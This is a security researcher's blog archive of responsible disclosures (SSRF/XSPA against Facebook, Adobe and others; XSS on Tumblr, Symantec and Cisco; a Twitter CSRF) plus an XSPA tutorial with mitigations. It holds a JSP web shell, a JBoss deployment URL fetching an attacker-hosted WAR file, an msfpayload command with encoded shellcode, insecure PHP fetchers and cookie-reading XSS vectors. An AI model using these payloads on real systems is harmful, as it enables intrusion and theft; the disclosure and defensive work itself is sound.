A Bug Hunter's Rhapsody

XSPA / SSRF bug with Facebook's Developer Web Application

2013-05-10T14:20:00.001-07:00

This post is about a responsible disclosure I made to Facebook recently about a vulnerability with their developer.facebook.com web application that allowed an attacker to perform port scans on remote machines on the Internet. An attacker could scan Internet facing machines for open ports and proxy his scans through Facebook's IP addresses using this vulnerability.

The URL at http://developers.facebook.com/tools/debug/og/object is vulnerable to a SSRF / XSPA vulnerability (CWE-918), via the 'q' parameter, allowing an attacker to port scan external internet facing systems and identify IP addresses on the Internal network as well based on error messages and response data.

The following steps can be used to reproduce the issue. All scans have been verified against scanme.nmap.org that is known to have ports 22, 80 and 9929 open.

Step 1: Navigate to http://developers.facebook.com/tools/debug and enter the following URL in the 'q' text box (open port test). http://scanme.nmap.org:22/index.html
A GET request is sent to http://developers.facebook.com/tools/debug/og/object with the 'q' parameter being passed via the URL.

Step 2: Notice the "Response Code" received by Facebook from the remote server (502).

Step 3: Repeat the request for http://scanme.nmap.org:25/index.html (closed port test)

Step 4: Notice the Response code received by facebook from the remote server (503).

Other responses that have been noticed for open ports include 200, 404 and 206. An error response "Error parsing input URL, no data was scraped." is also seen if a request to a non ASCII port is sent (3389 etc).

I wrote a simple port scanner in python that utilises this bug to make connections to remote systems which you can download from github.

Facebook paid out a bounty for this bug although they did not fix the issue completely. This is what they had to say:

"There are quite a few ways that our service can be made to issue requests to third-parties, and it's unfortunately not feasible to block non-standard ports on all of them. This debugging tool is one of those endpoints where it's incredibly helpful to allow requests to non-standard ports. We monitor and rate-limit the usage of this endpoint but the implications here are low-risk enough that we've decided not to eliminate this helpful functionality entirely."

And I agree, rate-limiting the number of requests received from a single IP/subnet/network that look suspicious is one way this could be kept under check, however this bug will remain a good example of a functionality that can be heavily abused.

Happy hunting!!

XSPA / SSRF Vulnerability with the Adobe Omniture Web Application

2013-04-23T15:35:00.000-07:00

This is a video demonstrating the XSPA / SSRF vulnerability that I discovered on the Adobe's Omniture Web Application back in November 2012 while writing a paper for BlackHat2012 AD. This was a typical XSPA / SSRF bug that allowed, amongst other things, to port scan Internet facing servers using Adobe's machines, read local files using the file:// protocol and detect internal machines and services running on them.

Adobe has now fixed this issue and put me on the Adobe's Acknowledgement page for Security Researchers.

More on SSRF / XSPA: http://cwe.mitre.org/data/definitions/918.html http://www.riyazwalikar.com/2012/11/cross-site-port-attacks-xspa-part-1.html

Comments and feedback are welcome!

AppSecUSA 2012 - Cross Site Port Attacks Talk Video

2012-12-02T07:32:00.001-08:00

My talk on Cross Site Port Attacks (XSPA) at the recently concluded AppSecUSA 2012, Austin,TX is now online. Here's an embed:

Comments and feedback are welcome!

Cross Site Port Attacks - XSPA - Part 3

2012-11-14T12:48:00.000-08:00

In the last 2 posts we saw what Cross Site Port Attacks (XSPA) are and what are the different attacks that are possible via XSPA. This post is in continuation with the previous posts and is the last in the series of three. In this post we will see other interesting attacks and also see how developers can prevent XSPA or limit the attack surface itself.

Read Cross Site Port Attacks - XSPA - Part 1
Read Cross Site Port Attacks - XSPA - Part 2

Attacks - Attacking Internal Vulnerable Web Applications

Most often than not, intranet applications lack even the most basic security allowing an attacker on the internal network to attack and access server resources including data and code. Being an intranet application, reaching it from the Internet requires VPN access to the internal network or specialized connectivity on the same lines. Using XSPA, however, an attacker can target vulnerable internal web applications via the Internet exposed web application.

A very common example I can think of and which I have seen during numerous pentests is the presence of a JBoss Server vulnerable to a bunch of issues. My most favorite of them being the absence of authentication, by default, on the JMX console which runs on port 8080 by default.

A well documented hack using the JMX console, allows an attacker to deploy a war file containing JSP code that would allow command execution on the server. If an attacker has direct access to the JMX console, then deploying the war file containing the following JSP code is relatively straightforward:

<%@ page import="java.util.*,java.io.*"%>
<pre>
<% Process p = Runtime.getRuntime().exec("cmd /c " + request.getParameter("x"));
DataInputStream dis = new DataInputStream(p.getInputStream());
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
} %>
</pre>

Using the MainDeployer under jboss.system:service in the JMX Bean View we can deploy a war file containing a JSP shell. The MainDeployer can be found at the following address:

http://example_server:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system%3Aservice%3DMainDeployer

Using the MainDeployer, for example, a war file named cmd.war containing a shell named shell.jsp can be deployed to the server and accessed via http://example_server:8080/cmd/shell.jsp. Commands can then be executed via shell.jsp?x=[command]. To perform this via XSPA we need to obviously replace the example_server with the IP/hostname of the server running JBoss on the internal network.

A small problem here that becomes a roadblock in performing this attack via XSPA is that the file deploy works via a POST request and hence we cannot craft a URL (atleast we think so) that would deploy the war file to the server. This can easily be solved by converting the POST to a GET request for the JMX console. On a test installation, we can identify the variables that are being sent to the JBoss server when the Main Deployer's deploy() function is called. Using your favorite proxy, or simply using the Firefox addon - Web Developer's "Convert POST to GET" functionality, we can construct a URL that would allow deploying of the cmd.war file to the server. We then only need to host the cmd.war file on an Internet facing server so that we can specify the cmd.war file URL as arg0. The final URL would look something like (assuming JBoss server is running on the same web server):

http://127.0.0.1:8080/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://our_public_internet_server/utils/cmd.war

Use this URL as input to the XSPA vulnerable web application and if the application displays received responses from the backend, you should see something on the lines of the following:

Then its a matter of requesting shell.jsp via the XSPA vulnerable web application. For example, the following input would return the directory listing on the JBoss server (assuming its Windows, for Linux, x=ls%20-al can be used)

http://127.0.0.1:8080/cmd/shell.jsp?x=dir

http://127.0.0.1:8080/cmd/shell.jsp?x=tasklist

We have successfully attacked an internal vulnerable web application from the Internet using XSPA. We can then use the shell to download a reverse connect program that would give higher flexibility over issuing commands. Similarily other internal applications vulnerable to threats like SQL Injection, parameter manipulation and other URL based attacks can be targeted from the Internet.

Attacks - Reading local files using file:/// protocol

All the attacks that we saw till now make use of the fact that the XSPA vulnerable web application creates an HTTP request to the requested resource. The protocol in all cases was specified by the attacker. On the other hand, if we specify the file protocol handler, we maybe able to read local files on the server. An input of the following form would cause the application to read files on disk:

Request: file:///C:/Windows/win.ini

The following screengrab shows the reading of the /etc/passwd file on an Adobe owned server via Adobe's Omniture web application. The request was file:///etc/passwd. Adobe has now fixed this issue and credited me on the Adobe Hall of Fame for the same:

How do you fix this?

There are multiple ways of mitigating this vulnerability, the most ideal and common techniques of thwarting XSPA, however, are listed below:
1. Response Handling - Validating responses received from remote resources on the server side is the most basic mitigation that can be readily implemented. If a web application expects specific content type on the server, programmatically ensure that the data received satisfies checks imposed on the server before displaying or processing the data for the client.

2. Error handling and messages - Display generic error messages to the client in case something goes wrong. If content type validation fails, display generic errors to the client like "Invalid Data retrieved". Also ensure that the message is the same when the request fails on the backend and if invalid data is received. This will prevent the application from being abused as distinct error messages will be absent for closed and open ports. Under no circumstance should the raw response received from the remote server be displayed to the client.

3. Restrict connectivity to HTTP based ports - This may not always be the brightest thing to do, but restricting the ports to which the web application can connect to only HTTP ports like 80, 443, 8080, 8090 etc. can lower the attack surface. Several popular web applications on the Internet just strip any port specifications in the input URL and connect to the port that is determined by the protocol handler (http - 80, https - 443).

4. Blacklist IP addresses - Internal IP addresses, localhost specifications and internal hostnames can all be blacklisted to prevent the web application from being abused to fetch data/attack these devices. Implementing this will protect servers from one time attack vectors. For example, even if the first fix (above) is implemented, the data is still being sent to the remote service. If an attack that does not need to see responses is executed (like a buffer overflow exploit) then this fix can actually prevent data from ever reaching the vulnerable device. Response handling is then not required at all as a request was never made.

5. Disable unwanted protocols - Allow only http and https to make requests to remote servers. Whitelisting these protocols will prevent the web application from making requests over other protocols like file:///, gopher://, ftp:// and other URI schemes.

Conclusion

Using web applications to make requests to remote resources, the local network and even localhost is a technique that has been known to pentesters for some time now. It has been termed as Server Side Request Forgeries, Cross Site Port Attacks and even Server Side Site Scanning, but the primary idea is to present it to the community and show that this vulnerability is extremely common. XSPA, in the case of this research, can be used to proxy attacks via vulnerable web applications to remote servers and local systems.

We have seen that XSPA can be used to port scan remote Internet facing servers, intranet devices and the local web server itself. Banner grabbing is also possible in some cases. XSPA can also be used to exploit vulnerable programs running on the Intranet or on the local web server. Fingerprinting intranet web applications using static default files & application behaviour is possible. It is also possible in several cases to attack internal/external web applications that are vulnerable to GET parameter based vulnerabilities (SQLi via URL, parameter manipulation etc.). Lastly, XSPA has been used to document local file read capabilities using the file:/// protocol handler in Adobe's Omniture web application.

Mitigating XSPA takes a combination of blacklisting IP addresses, whitelisting connect ports and protocols and proper non descriptive error handling.

In the next several posts I will publish disclosures regarding XSPA in several websites on the Internet which triggered the research into this vulnerability in the first place.

Cross Site Port Attacks - XSPA - Part 2

2012-11-13T15:36:00.000-08:00

This is the second post in the 3 part series that explains XSPA, the attacks and possible countermeasures.

Read Cross Site Port Attacks - XSPA - Part 1
Read Cross Site Port Attacks - XSPA - Part 3

Attacks

XSPA allows attackers to target the server infrastructure, mostly the intranet of the web server, the web server itself and any public Internet facing server as well. Currently, I have come across the following five different attacks that can be launched because of XSPA:
1. Port Scanning remote Internet facing servers, intranet devices and the local web server itself. Banner grabbing is also possible in some cases.
2. Exploiting vulnerable programs running on the Intranet or on the local web server
3. Fingerprinting intranet web applications using standard application default files & behavior
4. Attacking internal/external web applications that are vulnerable to GET parameter based vulnerabilities (SQLi via URL, parameter manipulation etc.)
5. Reading local web server files using the file:/// protocol handler.

Most web server architecture would allow the web server to access the Internet and services running on the intranet. The following visual depiction shows the various destinations to which requests can be made:

Let us now look at some of the attacks that are possible with XSPA. These are attacks that I have come across during my Bug Bounty research and XSPA is not limited to them. A determined, intuitive attacker can come up with other scenarios as well.

Attacks - Port Scanning using XSPA

Consider a web application that provides a common functionality that allows a user to input a link to an external image from a third party server. Most social networking sites have this functionality that allows users to update their profile image by either uploading an image or by providing a URL to an image hosted elsewhere on the Internet.

A user is expected (in an utopian world) to enter a valid URL pointing to an image on the Internet. URLs of the following forms would be considered valid:

http://example.com/dir/public/image.jpg

http://example.com/dir/images/

The second URL is valid, if the served Content-Type is an image (http://www.w3.org/Protocols/rfc1341/4_Content-Type.html). Based on the web application's server side logic, the image is downloaded on the server, a URL is created and then the image is displayed to the user, using the new server URL. So even if you specify the image to be at
http://example.com/dir/public/image.jpg
the final image url would be at
http://gravatar.com/user_images/username/image.jpg.

If an image is not found at the user supplied URL, the web application will normally inform the user of such. However, if the remote server hosting the image itself isn't found or the server exists and there is no HTTP service running then it gets tricky. Most web applications generate error messages that inform the user regarding the status of this request. An attacker can specify a non-standard yet valid URI according to the URI rfc3986 with a port specification. An example of these URIs would be the following:

http://example.com:8080/dir/images/

http://example.com:22/dir/public/image.jpg

http://example.com:3306/dir/images/

In all probability you would find a web application on port 8080 and not on 22 (SSH) or 3306 (MySQL). However, the backend logic of the webserver, in all observed cases, will connect to the user specified URL on the mentioned port using whatever APIs and framework it is built over as these are valid HTTP URLs. In case of most TCP services, banners are sent when a socket connection is created and since most banners (containing juicy information) are printable ascii, they can be displayed as raw HTML via the response handler. If there is some parsing of data on the server then non HTML data may not be displayed, in such cases, unique error messages, response byte size and response timing can be used to identify port status providing an avenue for port scanning remote servers using the vulnerable web application. An attacker can analyze the returned error messages and identify open and closed ports based on unique error responses. These responses may be raw socket errors (like "Connection refused" or timeouts) or may be customized by the application (like "Unexpected header found" or "Service was not reachable"). Instead of providing a URL to a remote server, URLs to localhost (http://127.0.0.1:22/image.jpg) can also be used to port scan the local server itself!

The following implementation of cURL can be abused to port scan devices:

<?php
if (isset($_POST['url']))
{
$link = $_POST['url'];
$filename = './curled/'.rand().'txt';
$curlobj = curl_init($link);
$fp = fopen($filename,"w");
curl_setopt($curlobj, CURLOPT_FILE, $fp);
curl_setopt($curlobj, CURLOPT_HEADER, 0);
curl_exec($curlobj);
curl_close($curlobj);
fclose($fp);
$fp = fopen($filename,"r");
$result = fread($fp, filesize($filename));
fclose($fp);
echo $result;
?>

The following is a screengrab of the above code retrieving robots.txt from http://www.twitter.com:

Request: http://www.twitter.com/robots.txt

For the same page, if a request is made to fetch data from a open port running a non HTTP service:

Request: http://scanme.nmap.org:22/test.txt

For a closed port, an application specific error is displayed:

Request: http://scanme.nmap.org:25/test.txt

The different responses received allow us to port scan devices using the vulnerable web application server as a proxy. This can easily be scripted to achieve automation and cleaner results. I will be (in later posts) showing how this attack was possible on Facebook, Google, Mozilla, Pinterest, Adobe and Yahoo!

An attacker can also modify the request URLs to scan the internal network or the local server itself. For example:

Request: http://127.0.0.1:3306/test.txt

In most web applications on the Internet, barring a few, banner grabbing may not be possible, in which case application specific error messages, response byte size, server response times and changes in HTML source can be used as unique fingerprints to identify port status. The following screengrabs show port scanning via XSPA in Google's Webmasters web application. Note the application specific error messages that can be used to script the vulnerability and automate scanning of Internet/Intranet devices. Google has now fixed this issue (and my name was listed in the prestigious Google Hall of Fame for security researchers):

Attacks - Exploiting vulnerable network programs

Most developers in the real world write code without incorporating a lot of security. Which is why, even after a decade of being documented, threats like buffer overflows and format string vulnerabilities are still found in applications. For applications built in-house to perform specific tasks, security is almost never in the list of priorities, hence attacking them gives easy access to the internal network. XSPA allows attackers to send data to user controlled addresses and ports which could have vulnerable services listening on them. These can be exploited using XSPA to execute code on the remote/local server and gain a reverse shell (or perform an attacker desired activity).

If we look at the flow of an XSPA attack, we can see that we control the part after the port specification. In simpler terms, we control the resource that we are asking the web server to fetch from the remote/local server. The web server creates a GET (or POST, mostly GET) request on the backend and connects to the attacker specified service and issues the following HTTP request:

GET /attacker_controlled_resource HTTP/1.1
Host: hostname

If you notice carefully, we do not need to be concerned about most of the structure of the backend request as we control the most important part of it, the resource specification. For example, in the following screengrab you can see that a program listening on port 8987 on the local server accepts input and prints "Hello GET /test.txt HTTP/1.1, The Server Time is: [server time]". We can see that the "GET /test.txt HTTP/1.1" is sent by the web server to the program as part of its request creation process. If the program is vulnerable to a buffer overflow, as user input is being used to create the output, the attacker could pass an overly long string and crash the program.

Request: http://127.0.0.1:8987/test.txt

Request: http://127.0.0.1:8987/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

On testing the vulnerable copy on a local installation, we can see that EIP can be controlled and ESP has our data. Calculating the correct offset for EIP and building the exploit is beyond this blog post, however, the folks at Corelan have a brilliant series of tutorials on building exploits for vulnerable programs. One important point to be noted however is that HTTP being a text based protocol may not handle non-printable unicode characters (found in exploit code) properly. In such a situation, we can use msfencode (part of metasploit framework) to encode the exploit payload to alpha numeric using the following command:

msfpayload windows/exec CMD=calc.exe R | msfencode BufferRegister=ESP -e x86/alpha_mixed

The result? The following alphanumeric text (along with padding AAAAAAs, the static JMP ESP address and the shellcode) that can now be sent via the web application to the vulnerable program:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@'ßwTYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlhhmYUPWpWp3Pk9he01xRSTnkpRfPlKPRtLLKPR24NkbR7XDOMgszuvVQ9oeaKpllgL3QQl5RFLWPiQJodM31JgKRHpaBPWNk3bvpLKsrWLwqZpLK1P0xMU9PSDCz7qZpf0NkQX6xnk2xUps1n3xcgL3yNkednkVayF4qKO5aKpnLIQJo4M31O76XIpbUzTdC3MHxGKamvDbU8bchLKShEtgqhSQvLKtLRkNkShuLgqZslK5TlKVaZpoy3tGTWTqKqKsQ0YSjRqyoKP2xCoSjnkwb8kLFqM0jFaNmLElyc05PC0pPsX6QlK0oOwkOyEOKhph5920VBHY6MEoMOmKON5Uls6SLUZMPykip2UfeoK3wfs422OBJs0Sc9oZuCSPaPl3SC0AA

Sucessful exploitation leads to calculator executing on the server. The shellcode can be replaced with other payloads as well (reverse shell perhaps?)

Attacks - Fingerprinting Intranet Web Applications

Identifying internal applications via XSPA would be one of the first steps an attacker would take to get into the network from outside. Fingerprinting the type and version, if its a publicly available framework, blogging platform, application module or simply a customized public CMS, is essential in identifying vulnerabilities that can then be exploited to gain access.

Most publicly available web application frameworks have distinct files and directories whose presence would indicate the type and version of the application. Most web applications also give away version and other information through meta tags and comments inside the HTML source. Specific vulnerabilites can then be researched based on the results. For example, the following unique signatures help in identifying a phpMyAdmin, Wordpress and a Drupal instance respectively:

Request: http://127.0.0.1:8080/phpMyAdmin/themes/original/img/b_tblimport.png
Request: http://127.0.0.1:8081/wp-content/themes/default/images/audio.jpg
Request: http://127.0.0.1:8082/profiles/minimal/translations/README.txt

The following request attempts to identify the presence of a DLink Router:

Request: http://10.0.0.1/portName.js

Once the web application has been identified, an attacker can then research vulnerabilities and exploit vulnerable applications. In the next post we shall see how intranet web applications can be attacked and how servers can be abused using other protocols as well. We will also take a look at fixes that are suggested for developers to thwart XSPA or limit the damage that can arise due to this vulnerability.

Cross Site Port Attacks - XSPA - Part 1

2012-11-07T03:59:00.002-08:00

This is the first of a 3 part series of blog posts that explain Cross Site Port Attacks(XSPA) in greater detail. I disclosed this as a speaker at the recently concluded OWASP AppSecUSA2012, Austin and thought it was about time I blogged as well.

Read Cross Site Port Attacks - XSPA - Part 2
Read Cross Site Port Attacks - XSPA - Part 3

Update: Please note that this is independent research conducted as part of my involvement with Bug Bounty programs with several companies and although related to Alexander Polyakov's research on SSRF, the similarity in findings are merely a coincidence and are focused on showing how common XSPA/SSRF are in popular web applications.

Overview

Many web applications provide functionality to pull data from other webservers for various reasons. Using user specified URLs, web applications can be made to fetch images, download XML feeds from remote servers, text based files etc. This functionality can be abused by making crafted queries using the vulnerable web application as a proxy to attack other services running on remote/local servers. Attacks arising via this abuse of functionality are named as Cross Site Port Attacks (XSPA).

What is XSPA?

An application is vulnerable to Cross Site Port Attacks if the application processes user supplied URLs and does not verify/sanitize the backend response received from remote servers before sending it back to the client. An attacker can send crafted queries to a vulnerable web application to proxy attacks to external Internet facing servers, intranet devices and the web server itself using the advertised functionality of the vulnerable web application. The responses, in certain cases, can be studied to identify service availability (port status, banners etc.) and even fetch data from remote services in unconventional ways.

The following screengrab shows gravatar.com providing this functionality:

XSPA allows attackers to abuse available functionality in most web applications to port scan intranet and external Internet facing servers, fingerprint internal (non-Internet exposed) network aware services, perform banner grabbing, identify web application frameworks, exploit vulnerable programs, run code on reachable machines, exploit web application vulnerabilities listening on internal networks, read local files using the file protocol and much more. XSPA has been discovered with Facebook, where it was possible to port scan any Internet facing server using Facebook’s IP addresses. Consecutively, XSPA was also discovered in several other prominent web applications on the Internet, including Google, Apigee, StatMyWeb, Mozilla.org, Face.com, Pinterest, Yahoo, Adobe Omniture and several others. We will take a look at the vulnerabilities that were present in the above mentioned web applications that could be used to launch attacks and perform port scans on remote servers and intranet devices using predefined functionality.

Examples of Implementation

Let us look at some examples of PHP implementations of file fetching via user supplied URLs. XSPA affects web applications written in any language as long as they let users decide where the data would be fetched from. Please note the examples shown below are neither clean nor secure, however most of the parts of the code outlined below have been obtained from real world application sources.

1. PHP file_get_contents:

<?php
if (isset($_POST['url']))
{
$content = file_get_contents($_POST['url']);
$filename = './images/'.rand().'img1.jpg';
file_put_contents($filename, $content);
echo $_POST['url']."";
$img = "<img src=\"".$filename."\"/>";
}
echo $img;
?>

This implementation fetches data as requested by a user (an image in this case) using the file_get_contents PHP function and saves it to a file with a randomly generated filename on the disk. The HTML img attribute then displays the image to the user.

2. PHP fsockopen() function:

<?php
function GetFile($host,$port,$link)
{
$fp = fsockopen($host, intval($port), $errno, $errstr, 30);
if (!$fp) {
echo "$errstr (error number $errno) \n";
} else {
$out = "GET $link HTTP/1.1\r\n";
$out .= "Host: $host\r\n";
$out .= "Connection: Close\r\n\r\n";
$out .= "\r\n";
fwrite($fp, $out);
$contents='';
while (!feof($fp)) {
$contents.= fgets($fp, 1024);
}
fclose($fp);
return $contents;
}
}
?>

This implementation fetches data as requested by a user (any file or HTML) using the fsockopen PHP function. This function establishes a TCP connection to a socket on the server and performs a raw data transfer.

3. PHP curl_exec() function:

<?php
if (isset($_POST['url']))
{
$link = $_POST['url'];
$curlobj = curl_init();
curl_setopt($curlobj, CURLOPT_POST, 0);
curl_setopt($curlobj,CURLOPT_URL,$link);
curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($curlobj);
curl_close($curlobj);

$filename = './curled/'.rand().'.txt';
file_put_contents($filename, $result);
echo $result;
}
?>

This is another very common implementation that fetches data using cURL via PHP. The file/data is downloaded and stored to disk under the 'curled' folder and appended with a random number and the '.txt' file extension.

In the next part of this series, we shall see some of the attacks that can be launched using this vulnerbility. XSPA allows attackers to target the server infrastructure, mostly the intranet of the web server, the web server itself and any public Internet facing server as well. Currently, I have come across the following five different attacks that can be launched using XSPA:

1. Port Scanning remote Internet facing servers, intranet devices and the local web server itself. Banner grabbing is also possible in some cases.
2. Exploiting vulnerable programs running on the Intranet or on the local web server
3. Attacking internal/external web applications that are vulnerable to GET parameter based vulnerabilities (SQLi via URL, parameter manipulation etc.)
4. Fingerprinting intranet web applications using standard application default files & behavior
5. Reading local web server files using the file:/// protocol handler.

We will see examples of each of these scenarios in several prominent web applications on the Internet as well.

Stored (Persistent) XSS on tumblr

2012-07-11T09:02:00.000-07:00

Tumblr is vulnerable to a Stored (persistent) Cross Site Scripting Vulnerability, which I disclosed to them around 3 weeks ago, but it looks like its still not fixed.

Tumblr, stylized as tumblr., is a microblogging platform and social networking website, owned and operated by Tumblr, Inc. The service allows users to post multimedia and other content to a short-form blog, named a "tumblelog". Users can follow other users' blogs, as well as make their blogs private.Much of the website's features are accessed from the "dashboard" interface, where the option to post content and posts of followed blogs appear. [Source: Wikipedia]

Last I checked, tumblr has 63.7 Million Blogs and 27 Billion Posts [http://www.tumblr.com/about] and which is why it is very discomforting to find an issue like XSS on a site that is ranked 35 on Alexa.

For the newbies, Cross Site Scripting is a vulnerability that arises if an application does not sanitize user input and sends it back to the browser without removing/encoding malicious characters. Malicious characters are any set of characters that a browser can use to render HTML or script content (<,>,",/> etc..). So, instead of displaying the user input, the browser will render/execute it depending on whether the input was HTML tagged content or script content.

XSS can cause a lot of serious problems. An attacker can steal cookies, redirect users to fake or malicious sites, control a user's browser using automated frameworks like BeEF and download and execute exploits on the victim's computer. Stored XSS is even more dangerous since the script is stored on the server and is executed everytime user visits an infected page. Several XSS based worms have been created in the past that have caused a lot of trouble on popular websites like Myspace and Orkut.

I will wait another week before posting the technical details here, in the mean time here are some screenshots for the curious:

Update [14 July 2012]: Tumblr has fixed the Stored XSS vulnerability, so here are the technical details as promised.

The XSS issue was on the "Register Application" page at http://www.tumblr.com/oauth/apps. The application was not sanitizing user input when a user would create a new application. An XSS attack vector like tester"><img src='x' onerror="alert(document.cookie)" /> would trigger an alert box, displaying the user's cookie, in the browser.

Great work on the part of the Tumblr Security team in getting this fixed. I only hope they don't wait 3 weeks before fixing something like this the next time.

PHP Parse error: syntax error, unexpected $end in on line - The Error and The Fix

2012-06-23T13:31:00.000-07:00

While working on a test web application, last night, I hit upon the following error, which for a second had me lost.

I checked to see if I had the opening and the closing tags correct. Upon further investigation, I found that this was due to my using the "short tag" for PHP in the html_functions.php file. I normally use "<?php" to open and "?>" to close my PHP statements, but in this particular file, I had missed on the "php" and had accidentally used "<?" to open a statement.

As it is evident from the image, I use XAMPP to host test applications, when developing on Windows. To find more about this setting I did some reading on a specific setting in php.ini called "short_open_tag". I opened the php.ini inside "c:\xampp\php\php.ini" - which is the default location for XAMPP, and searched for the "short_open_tag" setting. This specific setting was set to "off", so the quickfix was to merely change the setting to "on", restarting Apache and reloading the page. The setting in the php.ini finally looked like this:

short_open_tag = On

The following paragraph explains the setting better, taken from the php.ini file.

This directive determines whether or not PHP will recognize code between <? and ?> tags as PHP source which should be processed as such. It's been recommended for several years that you not use the short tag "short cut" and instead to use the full <?php and ?> tag combination. With the wide spread use of XML and use of these tags by other languages, the server can become easily confused and end up parsing the wrong code in the wrong context. But because this short cut has been a feature for such a long time, it's currently still supported for backwards compatibility, but we recommend you don't use them.

Default Value: On
Development Value: Off
Production Value: Off
http://php.net/short-open-tag

Problem solved, I spent the rest of the time I had on some fancy GUI and cookie monsters :D

Multiple Vulnerabilities with the Cisco Developer Network

2012-06-19T22:41:00.001-07:00

I found a bunch of vulnerabilities with Cisco subdomains a couple of weeks ago, some of them were plain old XSS vulnerabilities,while others were more interesting. Cisco is yet to fix some of them which I will not be talking about here, however I will discuss the other issues that I found and which have now been fixed.

I found an XSS on the developer.cisco.com domain, and since Cisco uses Single Sign On for most of its subdomains, an attacker could simply exploit this issue and gain access to the user accounts under other Cisco domains. The Cisco Developer Network runs on a well known product, which is actively maintained by the developers and used worldwide by several major corporations.

For the noobs, An XSS or Cross Site Scripting vulnerability occurs when an application accepts user input and sends it back to the browser without removing/encoding malicious characters. Malicious characters are any set of characters that a browser can use to render HTML or script content (<,>,",/> etc..). So, instead of displaying the user input, the browser will render/execute it depending on whether the input was HTML tagged content or script content.

XSS can cause a lot of serious problems. An attacker can steal cookies, redirect users to fake or malicious sites, control a user's browser using automated frameworks like BeEF and download and execute exploits on the victim's computer.

The other issue I found was particularly interesting because the application failed to check necessary user privilege levels while a user attempted access to application modules that were obviously sensitive. To this effect, I was able to locate the administration modules of several key sections under developer.cisco.com that would have allowed me to upload files, change and delete the content that users would see. I had access to all available administrative tasks since the application was clearly not checking whether I had admin or guest privileges. To make things worse, Google had traversed and cached these pages which would allow an attacker to reach to all the administration modules following an advanced Google search.

Now that both the issues have been fixed, here's a finer look at the vulnerabilities:

1. XSS in the Cisco Developer Network (developer.cisco.com)
The following pages accept client side input via the '_153_keywords' parameter and render it back to the browser without sanitization.

http://developer.cisco.com/group/control_panel/manage?p_p_id=153&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view

http://developer.cisco.com/group/control_panel/manage?p_p_id=153&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&_153_tabs1=completed

This was a POST based XSS, hence to craft an attack vector, an attacker would need to create a page that autosubmits a form on page/body.

2. Insufficient privilege/permission check on the Cisco Developer Network.
The application did not verify the permission levels of logged in users when providing access to the administration modules of several sections listed on http://developer.cisco.com/web/cdc/tech under "Available Technology Centers"

Some examples were:

http://developer.cisco.com/web/cupapi/admin
http://developer.cisco.com/web/telesched/administration

An advanced Google search, like the following, can get a list of modules that were vulnerable:
https://www.google.co.in/search?q=site:developer.cisco.com/web/%20inurl:admin%20|%20inurl:administration

Waiting for Cisco to fix some other issues on several other domains before I disclose them here. Till then Happy Hacking!

XSS vulnerabilities in Symantec websites

2012-05-30T12:53:00.003-07:00

A couple of weeks ago, while doing some research for a paper I have been working on, I found two XSS vulnerabilities with the Symantec Learning Management System (symlms.symantec.com) and Enterprise Support Login Page (seer.entsupport.symantec.com). An XSS or Cross Site Scripting vulnerability occurs when an application accepts user input and sends it back to the browser without removing/encoding malicious characters. Malicious characters are any set of characters that a browser can use to render HTML or script content (<,>,",/> etc..). So, instead of displaying the user input, the browser will render/execute it depending on whether the input was HTML tagged content or script content.

XSS can cause a lot of serious problems. An attacker can steal cookies, redirect users to fake or malicious sites, control a user's browser using automated frameworks like BeEF and download and execute exploits on the victim's computer.

On an average, it is easy to find XSS vulnerabilities on the Internet, but finding an XSS issue on a website that is owned and administered by a security services company is quite something. I reported both the vulnerabilities as soon as I discovered them and the security team at Symantec were quite appreciative and welcoming with my disclosures.

Now that both the issues have been fixed, here's a finer look at the vulnerabilities:

1. XSS in the Symantec Learning Management System (symlms.symantec.com)
The page at https://symlms.symantec.com/sumtotal/lang-en/SYS_login.asp accepts client side input via the 'ru' hidden parameter and renders it back to the browser without sanitization.

An attack vector could be crafted on the lines of:

https://symlms.symantec.com/sumtotal/lang-en/SYS_login.asp?ru=a%27/%3E%3Ch1%20onmousemove=javascript:alert%28document.cookie%29%3ETEST%3C/h1%3E

https://symlms.symantec.com/sumtotal/lang-en/SYS_login.asp?ru=tester%27%3E%3Ciframe%20src=%22http://www.wikipedia.org%22%20width=600%20height=1000%3E%3C/iframe%3E

2. XSS in the Enterprise Support Login Page (seer.entsupport.symantec.com)
The page at http://seer.entsupport.symantec.com/downloads/export.asp accepts client side input via the 'username', 'useremail' and 'userphone' parameters and renders it back to the browser without sanitization.

An attack vector could be crafted on the lines of:

http://seer.entsupport.symantec.com/downloads/export.asp?username=test%22%3E%3Cscript%3Ealert%280%29%3C/script%3E

http://seer.entsupport.symantec.com/downloads/export.asp?useremail=test%22%3E%3Cscript%3Ealert%280%29%3C/script%3E

http://seer.entsupport.symantec.com/downloads/export.asp?userphone=test%22%3E%3Cscript%3Ealert%280%29%3C/script%3E

Input sanitization and output encoding user input can provide protection. There are several libraries that actually make it easier for developers to create web applications without worrying too much about threats like XSS. The OWASP ESAPI library is something that comes to my mind when I find XSS anywhere.

A couple of more interesting disclosures lined up for June. Till then Happy Hacking!

Twitter Wipe Addressbook CSRF Vulnerability

2012-05-16T01:09:00.000-07:00

I disclosed a CSRF vulnerability with Twitter, that could allow a malicious attacker to wipe the address book of an unsuspecting user. I reported the vulnerability in the beginning of March and they fixed it on the 22nd! I wouldn't want to comment on the process and internal business logic that they follow, but honestly that was a a pretty long period for them to come up with a fix.

Anyways, getting to the vulnerability, the issue was that a user could delete his own address book with a single click URL, which is alright as long as the user wishes to do so himself. However, with the server not verifying whether the request was sent by the user himself or was the user was tricked into sending the request, the application allowed an attacker to generate a request on behalf of a logged in user from the user's browser and perform the action (deletion of the address book).

The normal process would be as follows:
1. A user logs into mobile.twitter.com
2. If he wants to delete ALL his previously imported contacts, he would click on "Remove Contacts" under Settings.
3. Upon clicking, a GET request is sent to "https://mobile.twitter.com/settings/wipe_addressbook"
4. A message is presented that the the user's contacts have been removed.

